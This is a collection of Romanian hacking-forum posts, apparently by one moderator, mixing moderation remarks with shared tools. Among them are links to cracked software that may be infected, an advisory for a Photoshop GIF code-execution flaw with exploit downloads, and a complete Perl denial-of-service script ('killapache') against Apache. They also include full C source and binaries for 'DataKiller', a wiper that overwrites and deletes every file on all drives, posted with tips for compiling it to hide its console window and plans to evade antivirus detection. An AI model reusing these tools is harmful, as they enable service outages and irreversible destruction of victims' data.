Nytro

Nu, nu am prea stat pe acasa, nu am avut cand sa intru. Oricum, o sa intru doar seara cand nu plec pe undeva. Nu stiu sa spun o ora anume...

Nu, aplicati degeaba daca nu stiti nimic din domeniu respectiv, nu aveti cum sa lucrati la un proiect si nici nu invatati nimic asa. La recrutare se pun intrebari din domeniile respective si sunt acceptati doar cei care se descurca.

Pff, de multe ori nu arata bine aceste site-uri, poate nu au boti buni, poate nu functioneaza corect... Ca sugestie, verifica din mai multe surse.

Da, nu avem 7 ani sa nu avem voie sa vorbim urat si nici sa nu auzim (vedem) cuvinte vulgare. Stiu ca uneori deranjeaza, dar nu putem schimba un mod de viata. In plus, cam toti folosim astfel de cuvinte in viata cotidiana, suntem obisnuiti cu un astfel de limbaj, deci nu cred ca sunt probleme, va trebui sa te acomodezi, sa faci abstractie de ele, nu cred ca reprezinta vreo problema. Topic inchis.

Nu se pune nici un "Group". Nu sunt "administratorii grupului Windows", sunt "administratori Windows". Si nu se face nicio confuzie, se vede ca "Linux Administrator" nu e acelasi lucru cu "Administrator" (cine nu vede isi cumpara ochelari). Evitati comentariile inutile. @ady_adam: Facem "orice" grup, pe masura ce se ofera voluntari pentru acel grup. E posibil sa fac un grup "Trolls", doar ca cei din acel grup vor face parte si din grupul "Banned users".

VanDyke Secure CRT SecureCRT combines rock-solid terminal emulation with the strong encryption, data integrity, and authentication options of the Secure Shell protocol. SecureCRT provides secure remote access, file transfer, and data tunneling for everyone in your organization. Arata aproximativ asa: Features: http://www.vandyke.com/products/securecrt/features.html Download de pe site oficial (Windows, Linux, Mac): http://www.vandyke.com/download/securecrt/download.html Il folositi sa va conectati la distanta prin telnet, SSH si altele. Are cateva optiui utile. Nu stiu daca e infectata versiunea cu patch, eu o folosesc si nu am avut probleme. Download cu patch: http://www.multiupload.com/04G0P5KLF0

Si mai bine: http://rstcenter.com/forum/39386-powergrep-4-a.rst

PowerGREP is a powerful Windows grep tool. Quickly search through large numbers of files on your PC or network, including text and binary files, compressed archives, MS Word documents, Excel spreadsheets, PDF files, OpenOffice files, etc. Find the information you want with powerful text patterns (regular expressions) specifying the form of what you want, instead of literal text. Search and replace with one or many regular expressions to comprehensively maintain web sites, source code, reports, etc. Extract statistics and knowledge from logs files and large data sets. Foarte util pentru cautarea in fisiere pe baza de expresii regulate, nu e deloc greu de folosit si are o tona de optiuni. Nu stiu daca e infectat, eu il folosesc si nu am avut probleme. Screenshot de pe site-ul oficial: http://www.powergrep.com/screens/powergrep.png E portabil, nu trebuie instalat. Download: http://www.multiupload.com/Q5VT2RWE8Y

Adobe Photoshop CS5 GIF Remote Code Execution ##################################################################################### Application: Adobe Photoshop CS5 GIF Remote Code Execution Platforms: Adobe Photoshop CS5 (12.0 and 12.1) Exploitation: Remote code execution CVE Number: CVE-2011-2131 Adobe Vulnerability Identifier: APSB11-22 {PRL}: 2011-08 Author: Francis Provencher (Protek Research Lab's) Website: http://www.protekresearchlab.com/ Twitter: @ProtekResearch ##################################################################################### 1) Introduction 2) Timeline 3) Technical details 4) PoC ##################################################################################### =============== 1) Introduction =============== Adobe Photoshop is a graphics editing program developed and published by Adobe Systems Incorporated. Adobe's 2003 "Creative Suite" rebranding led to Adobe Photoshop 8's renaming to Adobe Photoshop CS. Thus, Adobe Photoshop CS5 is the 12th major release of Adobe Photoshop. The CS rebranding also resulted in Adobe offering numerous software packages containing multiple Adobe programs for a reduced price. Adobe Photoshop is released in two editions: Adobe Photoshop, and Adobe Photoshop Extended, with the Extended having extra 3D image creation, motion graphics editing, and advanced image analysis features.[3]. Adobe Photoshop Extended is included in all of Adobe's Creative Suite offerings except Design Standard, which includes the Adobe Photoshop edition. http://en.wikipedia.org/wiki/Adobe_Photoshop ##################################################################################### ============================ 2) Timeline ============================ 2011-06-14 - Vulnerability reported to vendor 2011-09-09 - Coordinated public release of advisory ##################################################################################### ============================ 3) Technical details ============================ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe PhotoShop CS5. User interaction is required to exploit this vulnerability in that the target must open a malicious GIF file. When the "ushort ImageHeight" is crafted with an invalid value the memory is corrupted and arbitrary code can be run on the remote host. ##################################################################################### =========== 4) The Code =========== http://www.protekresearchlab.com/exploits/PRL-2011-08.gif http://exploit-db.com/sploits/17712.zip Sursa: Adobe Photoshop CS5 GIF Remote Code Execution Cand ajung acasa il testez si eu, parca aveam Photoshop CS5...

Atacurile la persoana, injuraturile... se pedepsesc. Daca nu vad eu (ceea ce e foarte posibil, nu am timp sa citesc toate posturile) imi puteti trimite PM si se rezolva.

Vreau link-uri... Pe mine nu ma deranjeaza un "plm" aruncat acolo, nu cred ca e problema. Daca sunt injuraturi da, se primeste avertisment. Bine, la offtopic nu ma complic sa dau avertismente, nu sunt foarte interesat de acea categorie. Vreau sa vad exemple de posturi cu limbaj inadecvat.

Noi membri ai grupurilor: - Xander - PHP Coder - silvian0 - PHP Coder - Gecko - Designer - denjacker - Web Vulnerability Master - Lider Cred ca 2 sunt pe lista de asteptare, ramane de vazut zilele astea daca vor fi sau nu recrutati.

Offtopic, nu stricati topicul.

Update: DataKiller v0.2 Ce e nou: - Safe file delete Vedeti primul post pentru mai multe informatii.

Semnaturi nu stiu daca are rost, dar daca cineva are nevoie de grafica, de imagini sau altceva pentru un proiect, cred ca Designerii vor fi bucurosi sa ajute.

Si uite asa avem un nou VIP.

Apache httpd Remote Denial of Service (memory exhaustion) #Apache httpd Remote Denial of Service (memory exhaustion) #By Kingcope #Year 2011 # # Will result in swapping memory to filesystem on the remote side # plus killing of processes when running out of swap space. # Remote System becomes unstable. # use IO::Socket; use Parallel::ForkManager; sub usage { print "Apache Remote Denial of Service (memory exhaustion)\n"; print "by Kingcope\n"; print "usage: perl killapache.pl <host> [numforks]\n"; print "example: perl killapache.pl www.example.com 50\n"; } sub killapache { print "ATTACKING $ARGV[0] [using $numforks forks]\n"; $pm = new Parallel::ForkManager($numforks); $|=1; srand(time()); $p = ""; for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } for ($k=0;$k<$numforks;$k++) { my $pid = $pm->start and next; $x = ""; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; while(<$sock>) { } $pm->finish; } $pm->wait_all_children; print ":pPpPpppPpPPppPpppPp\n"; } sub testapache { my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; $x = <$sock>; if ($x =~ /Partial/) { print "host seems vuln\n"; return 1; } else { return 0; } } if ($#ARGV < 0) { usage; exit; } if ($#ARGV > 1) { $numforks = $ARGV[1]; } else {$numforks = 50;} $v = testapache(); if ($v == 0) { print "Host does not seem vulnerable\n"; exit; } while(1) { killapache(); } Pare promitator... Sursa: Apache httpd Remote Denial of Service (memory exhaustion)

Florin Salam - Cap si pajura 2011 (Live Club One Million Timisoara) - YouTube

La optiunea de excludere a partitiei cu Windows m-am gandit. Dar pot fi si alte fisiere pe acolo. Cred ca voi pune optiune de ocolire ?:/Windows si ?:/Program Files, ca in Documents And Settings se mai afla date, la fel si /Users pe Windows 7. Dar cred ca ma complic degeaba. O sa ma mai gandesc si cand mai am timp liber mai lucrez la el.

Cine vrea sa fie recrutat in acel grup, add la "grupuri_rst" si discutam. Si vedem si cat intelege din ceea ce face.

Nu "o sa faca furori", doar ca va fi mai complex si mai util. Astept idei si sugestii, cat despre implementare, vor putea sa contribuie cei din grupul C/C++ coder.

Nu, VIP e altceva.

Da, sunt sigur ca daca vad "[G] Java Programmer" in loc de "Java Prgrammers", chiar daca e prima oara cand intra pe RST vor zice: "Aaaa, da ma, acum stiu, e cu grupurile alea de care nu stiu, dar "G" vine de la grupuri si m-a lamurit". Nu are rost, poate o sa pun un Italic, un stil aparte la ele, deocamdata nu e necesar.

"Registered user" != "Java Programmer" != "VIP" Si daca pui un copil care nu stie sa citeasca sa se uite, o sa isi dea seama ca nu e acelasi lucru. PS: Cei cu rangul de VIP au acum statusul grupului (Linux...), dar si permisiunile de VIP.

Nume: DataKiller Descriere: Sterge toate fisierele Autor: Grupul C/C++ Coder @ Romanian Security Team Marime: 8.5 KB Atentie! Nu rulati acest executabil, va incerca sa stearga toate fisierele! O descriere mai amanantita: acum ceva timp, mi-a cerut cineva un astfel de program si mi s-a parut o idee interesanta. Este a doua versiune, am de gand sa ii pun cateva optiuni utile (sa stearga doar pozele de exemplu). Ce e nou: - Safe File Delete Nu e nimic complicat, dar poate fi foarte util. Singurul lucru pe care il face e sa inlocuiasca toate datele din fisierele care urmeaza sa fie sterge cu NULL. Astfel, un fisier ce contine "aaa", va contine "NULL,NULL,NULL" apoi va fi sters. In caz ca nu stiati, cand dati Delete la un fisier, datele din fisier nu sunt sterse, ci e stearsa doar legatura catre acel fisier, dar datele raman pe hard disk si pot fi recuperate partial sau total. Cu aceasta optiune, nu vor mai putea fi recuperate, insa executia programului va fi MULT mai lunga si va consuma mai multe resurse. Va dura peste 30 de minute, depinde de marimea si nr. fisierelor de pe calculator. Eu estimez ca ar dura cam 1-2 ore o executie. Si oricum am cateva idei de viitor. E singura optiune implementata, dar dupa cum se vede in sursa mai am cateva idei de pus in aplicare. Codul sursa nu are rost sa il ascund, problema ar fi faptul ca nu e extraodrinar scris, nu m-am straduit sa fac optimizari. DataKiller.c /* Name: DataKiller.c Description: Delete all deleteable files Authors: Grupul C/C++ Coder @ Romanian Security Team Info: Nu toate optiunile au fost implementate */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> /* Setari definite de utilizator - puteti sa modificati valorile */ int safe_file_delete = 1; /* "-[n]sf" Sterge fisierul fara sa poata fi recuperat */ int safe_delete_file_info = 0; /* "-[n]si" Sterge si informatiile despre fisier */ int delete_all_files = 1; /* "-[n]da" Sterge toate fisierele */ int delete_all_images = 1; /* "-[n]di" Sterge toate imaginile */ int delete_all_media = 1; /* "-[n]dm" Sterge toate melodiile, videoclipurile */ int delete_all_documents = 1; /* "-[n]dd" Sterge toate documentele */ int exclude_windows_partition = 0; /* "-[n]ew" Nu sterge nimic de pe partita cu Windows-ul */ /* Marimi buffere */ #define VOLNAME_SIZE 4 #define VOLBUFFER_SIZE 1337 #define DIRBUFFER_SIZE 255 #define FILENAME_SIZE 31337 /* Contoare pentru nr. de fisiere si de foldere - statistici */ int nr_files = 0; int nr_directories = 0; int deleted_files = 0; int deleted_directories = 0; /* Functia inlocuieste datele dintr-un fisier cu 0 (NULL) */ void NullFile(const char *fisier) { HANDLE hFisier = NULL; DWORD file_size = 0; DWORD file_size_2 = 0, written = 0; unsigned char *buf = NULL; SetFileAttributes(fisier, FILE_ATTRIBUTE_NORMAL); hFisier = CreateFile(fisier, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, NULL); if(hFisier != INVALID_HANDLE_VALUE) { file_size = GetFileSize(hFisier, &file_size_2); /* NULL-uim fisierul, ca sa nu poata fi recuperate datele */ buf = (unsigned char *)malloc(file_size); memset(buf, 0, file_size); WriteFile(hFisier, buf, file_size, &written, NULL); free(buf); CloseHandle(hFisier); } } /* Functie recursiva, sterge folderele si fisierele */ void DeleteFiles(char *directory) { WIN32_FIND_DATA file_data; HANDLE hFisier; int new_file = 1; char dir_buffer[DIRBUFFER_SIZE] = {0}; char file_name[FILENAME_SIZE] = {0}; char new_dir[DIRBUFFER_SIZE] = {0}; /* Formam sirul de caractere pentru FindFirstFile */ memset(&file_data, 0, sizeof(WIN32_FIND_DATA)); sprintf(dir_buffer, "%s*", directory); hFisier = FindFirstFile(dir_buffer, &file_data); /* Parcurgem folderul */ while(hFisier != INVALID_HANDLE_VALUE && new_file) { sprintf(file_name, "%s%s", directory, file_data.cFileName); /* Daca e folder */ if(GetFileAttributes(file_name) & ~(FILE_ATTRIBUTE_DIRECTORY ^ 0xFFFFFFFF) && (GetFileAttributes(file_name) != (unsigned)-1)) { sprintf(new_dir, "%s\\", file_name); /* Evitam "." si ".." */ if(file_name[strlen(file_name) - 1] != '.') { nr_directories++; DeleteFiles(new_dir); if(RemoveDirectory(new_dir)) deleted_directories++; } } /* Daca e fisier */ else { nr_files++; if(safe_file_delete) NullFile(file_name); if(DeleteFile(file_name)) deleted_files++; } /* Trecem la urmatorul fisier/folder */ new_file = FindNextFile(hFisier, &file_data); } FindClose(hFisier); } int main(int argc, char *argv[]) { char *dir_buffer = NULL; char **drives = NULL; int dir_buf_size = 0, nr_drives = 0, i = 0, a = 0; /* Verificam parametrii din linia de comanda */ if(argc > 1) { for(a = 1; a < argc; a++) { /* Luam fiecare parametru in parte */ if(strcmp(argv[a], "-sf") == 0) safe_file_delete = 1; else if(strcmp(argv[a], "-nsf") == 0) safe_file_delete = 0; else if(strcmp(argv[a], "-si") == 0) safe_delete_file_info = 1; else if(strcmp(argv[a], "-nsi") == 0) safe_delete_file_info = 0; else if(strcmp(argv[a], "-da") == 0) delete_all_files = 1; else if(strcmp(argv[a], "-nda") == 0) delete_all_files = 0; else if(strcmp(argv[a], "-di") == 0) delete_all_images = 1; else if(strcmp(argv[a], "-ndi") == 0) delete_all_images = 0; else if(strcmp(argv[a], "-dm") == 0) delete_all_media = 1; else if(strcmp(argv[a], "-ndm") == 0) delete_all_media = 0; else if(strcmp(argv[a], "-dd") == 0) delete_all_documents = 1; else if(strcmp(argv[a], "-ndd") == 0) delete_all_documents = 0; else if(strcmp(argv[a], "-ew") == 0) exclude_windows_partition = 1; else if(strcmp(argv[a], "-new") == 0) exclude_windows_partition = 0; } } /* Alocam memorie */ dir_buffer = (char *)malloc(VOLBUFFER_SIZE); dir_buf_size = GetLogicalDriveStrings(VOLBUFFER_SIZE, dir_buffer); nr_drives = dir_buf_size / VOLNAME_SIZE; drives = (char **)malloc(sizeof(char *) * nr_drives); /* Parcurgem volumele */ for(i = 0; i < dir_buf_size / VOLNAME_SIZE; i++) { drives[i] = (char *)malloc(VOLNAME_SIZE); strncpy(drives[i], dir_buffer + i * VOLNAME_SIZE, VOLNAME_SIZE); printf("Drive: %s: %d\n", drives[i], GetDriveType(drives[i])); if(GetDriveType(drives[i]) == DRIVE_FIXED || GetDriveType(drives[i]) == DRIVE_REMOVABLE) DeleteFiles(drives[i]); } printf("Foldere: %d\nFisiere: %d\n", nr_directories, nr_files); printf("Foldere sterse: %d\nFisiere sterse: %d\n", deleted_directories, deleted_files); /* Eliberam memoria */ for(i = 0; i < nr_drives; i++) free(drives[i]); free(drives); free(dir_buffer); return 0; } Pastebin: [C] DataKiller.c - Pastebin.com Daca vreti sa il compilati, compilati-l cu optiunea "-mwindows" pentru linker, astfel incat sa nu se deschida CMD-ul cand va fi rulat. Eu l-am compilat si cu optimizari pentru marime "-s" si "-Os". Utilizare? Cred ca o sa ii gasiti voi una, cred ca vor fi destui care il vor gasi "util". Partea nasoala, din cate observ, e ca e detectabil... http://www.virustotal.com/file-scan/report.html?id=b0d3d314fa0de3e4041e16525017a7960641a089cd7bf5a887ccb9ec53d935df-1313949171 O sa lucrez si la acest aspect. Ideea e ca il puteti compila din sursa, sa nu credeti ca am postat altceva. Download: http://www.girlshare.ro/2529741.5 http://www.speedyshare.com/files/29969756/DataKiller.exe http://www.megaupload.com/?d=S88LSQH1 http://www.mediafire.com/?ti4gvi9nnj7g91q http://www.multiupload.com/DOTY3PVTX3 Stiu, e banal, stupid si non-etic, eu nu am nevoie de asa ceva dar unii poate au nevoie. Fiti rai!